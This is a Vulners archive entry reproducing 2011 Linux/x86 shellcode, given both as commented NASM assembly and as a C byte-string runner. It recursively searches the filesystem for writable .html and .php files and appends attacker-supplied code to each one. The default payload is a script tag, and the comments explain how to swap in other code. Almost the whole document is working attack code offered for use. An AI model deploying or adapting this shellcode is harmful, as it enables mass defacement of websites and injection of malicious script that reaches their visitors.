Vulners
Lucene search
Linux/x86 Search For php,html Writable Files and Add Your Code
; Title : Linux/x86 Search php,html writable files and add your code.
; Date : 2011-10-24
; Author: rigan - imrigan [sobachka ] gmail.com
; Size : 380 bytes + your code.
;
; Note : This shellcode writes down your code in the end of
; found files. Your code will be added only .html and .php
; files. Search for files is carried out recursively.
BITS 32
section .text
global _start
_start:
;======================================================================;
; main ;
;======================================================================;
; chdir("/")
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2f
mov ebx, esp
mov al, 12
int 0x80
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e
jmp SHORT .exit
.jmp_search:
jmp SHORT search
.exit:
call .jmp_search
; exit(0)
xor eax, eax
xor ebx, ebx
mov al, 1
int 0x80
;======================================================================;
; inject ;
;======================================================================;
inject:
; open("file", O_WRONLY)
xor eax, eax
mov ebx, edi
xor ecx, ecx
mov cl, 2
mov al, 5
int 0x80
; lseek(fd, 0, SEEK_END)
xor ebx, ebx
mov ebx, eax
xor ecx, ecx
xor eax, eax
cdq
mov dl, 2
mov al, 19
int 0x80
; write(fd, your_code, sizeof(your_code))
xor eax, eax
mov ecx, esi
mov dl, 43 ; <- TO CHANGE THE SIZE HERE.
mov al, 4
int 0x80
; close(fd)
xor eax, eax
xor ebx, ebx
mov al, 6
int 0x80
ret
;======================================================================;
; substr ;
;======================================================================;
substr:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cdq
loop_1:
inc edx
; edi contains the filename address
; esi contains the substring address
mov BYTE bl, [edi + edx]
test bl, bl
jz not_found
cmp BYTE bl, [esi]
jne loop_1
loop_2:
mov BYTE al, [esi + ecx]
mov BYTE bl, [edi + edx]
test al, al
jz found
inc ecx
inc edx
cmp bl, al
je loop_2
jmp short not_found
found:
xor eax, eax
mov al, 2
not_found:
ret
;======================================================================;
; search ;
;======================================================================;
;This function recursively find all writable files. [php, html]
search:
push ebp
mov ebp, esp
mov al, 250
sub esp, eax
; open(".", O_WRONLY)
xor eax, eax
xor ecx, ecx
lea ebx, [ebp + 8]
mov al, 5
int 0x80
test eax, eax
js .old_dirent
mov [ebp + 12], eax
.while:
; readdir(fd, struct old_linux_dirent *dirp, NULL)
mov esi, [ebp + 12]
mov ebx, esi
xor eax, eax
xor ecx, ecx
lea ecx, [esp + 100]
mov al, 89
int 0x80
test eax, eax
jnz .l1
; closedir(fd)
xor eax, eax
xor ebx, ebx
mov ebx, esi
mov al, 6
int 0x80
.old_dirent:
; chdir("..")
xor eax, eax
push eax
push WORD 0x2e2e
mov ebx, esp
mov al, 12
int 0x80
leave
ret
.l1:
lea edx, [esp + 110]
cmp DWORD [edx], 0x636f7270 ; If the /proc filesystem detected...
je .while ; ...next dir
cmp BYTE [edx], 0x2e
jne .l2
jmp .while
.l2:
; lstat(const char *file, struct stat *buf)
mov ebx, edx
mov ecx, esp
xor eax, eax
mov al, 196
int 0x80
mov cx, 61439
mov bx, 40959
inc ecx
inc ebx
mov eax, [esp + 16]
and ax, cx
cmp ax, bx
jne .l3
jmp .while
.l3:
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e
; chdir("file")
mov ebx, edx
mov al, 12
int 0x80
test eax, eax
jne .l4
call search
jmp .while
.l4:
; access("file", W_OK)
xor eax, eax
mov ebx, edx
xor ecx, ecx
mov cl, 2
mov al, 33
int 0x80
test eax, eax
jz .check_html
jmp .while
;======================================================================;
; check_html ;
;======================================================================;
.check_html:
xor eax, eax
push eax
push DWORD 0x6c6d7468 ;
sub esp, BYTE 0x1 ; .html
mov BYTE [esp], 0x2e ;
mov esi, esp
mov edi, edx
call substr
cmp BYTE al, 2
je .do_inject
;======================================================================;
; check_php ;
;======================================================================;
.check_php:
xor eax, eax
push eax
push DWORD 0x7068702e ; .php
mov esi, esp
call substr
cmp BYTE al, 2
je .do_inject
jmp .while
;======================================================================;
; do_inject ;
;======================================================================;
.do_inject:
jmp SHORT .your_code
.write:
pop esi ; Get the address of your code into esi
call inject
jmp .while
;======================================================================;
; your_code ;
;======================================================================;
.your_code:
call .write
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.
; Dont't forget to change the size of your code!
------------------------------------------------------------------------
Below is presented the shellcode equivalent.
#include <stdio.h>
char shellcode[] =
"\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2f\x89\xe3\xb0\x0c\xcd\x80"
"\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\xeb\x02\xeb\x63\xe8\xf9"
"\xff\xff\xff\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x31\xc0\x89\xfb\x31"
"\xc9\xb1\x02\xb0\x05\xcd\x80\x31\xdb\x89\xc3\x31\xc9\x31\xc0\x99"
"\xb2\x02\xb0\x13\xcd\x80\x31\xc0\x89\xf1\xb2\x2b\xb0\x04\xcd\x80"
"\x31\xc0\xb0\x06\xcd\x80\xc3\x31\xc0\x31\xdb\x31\xc9\x99\x42\x8a"
"\x1c\x17\x84\xdb\x74\x1a\x3a\x1e\x75\xf4\x8a\x04\x0e\x8a\x1c\x17"
"\x84\xc0\x74\x08\x41\x42\x38\xc3\x74\xf0\xeb\x04\x31\xc0\xb0\x02"
"\xc3\x55\x89\xe5\xb0\xfa\x29\xc4\x31\xc0\x31\xc9\x8d\x5d\x08\xb0"
"\x05\xcd\x80\x85\xc0\x78\x22\x89\x45\x0c\x8b\x75\x0c\x89\xf3\x31"
"\xc0\x31\xc9\x8d\x4c\x24\x64\xb0\x59\xcd\x80\x85\xc0\x75\x19\x31"
"\xc0\x31\xdb\x89\xf3\xb0\x06\xcd\x80\x31\xc0\x50\x66\x68\x2e\x2e"
"\x89\xe3\xb0\x0c\xcd\x80\xc9\xc3\x8d\x54\x24\x6e\x81\x3a\x70\x72"
"\x6f\x63\x74\xc6\x80\x3a\x2e\x75\x05\xe9\xbc\xff\xff\xff\x89\xd3"
"\x89\xe1\x31\xc0\xb0\xc4\xcd\x80\x66\xb9\xff\xef\x66\xbb\xff\x9f"
"\x41\x43\x8b\x44\x24\x10\x66\x21\xc8\x66\x39\xd8\x75\x05\xe9\x97"
"\xff\xff\xff\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\x89\xd3\xb0"
"\x0c\xcd\x80\x85\xc0\x75\x0a\xe8\x65\xff\xff\xff\xe9\x79\xff\xff"
"\xff\x31\xc0\x89\xd3\x31\xc9\xb1\x02\xb0\x21\xcd\x80\x85\xc0\x74"
"\x05\xe9\x64\xff\xff\xff\x31\xc0\x50\x68\x68\x74\x6d\x6c\x83\xec"
"\x01\xc6\x04\x24\x2e\x89\xe6\x89\xd7\xe8\x09\xff\xff\xff\x3c\x02"
"\x74\x18\x31\xc0\x50\x68\x2e\x70\x68\x70\x89\xe6\xe8\xf6\xfe\xff"
"\xff\x3c\x02\x74\x05\xe9\x30\xff\xff\xff\xeb\x0b\x5e\xe8\xb9\xfe"
"\xff\xff\xe9\x23\xff\xff\xff\xe8\xf0\xff\xff\xff"
// <html><script>alert("pwn3d")<script></html>
"\x3c\x68\x74\x6d\x6c\x3e\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c"
"\x65\x72\x74\x28\x22\x70\x77\x6e\x33\x64\x22\x29\x3c\x73\x63\x72"
"\x69\x70\x74\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e";
int main()
{
printf("%d\n", strlen(shellcode));
(*(void (*)()) shellcode)();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jan 2012 00:00Current
7.1High risk
Vulners AI Score7.1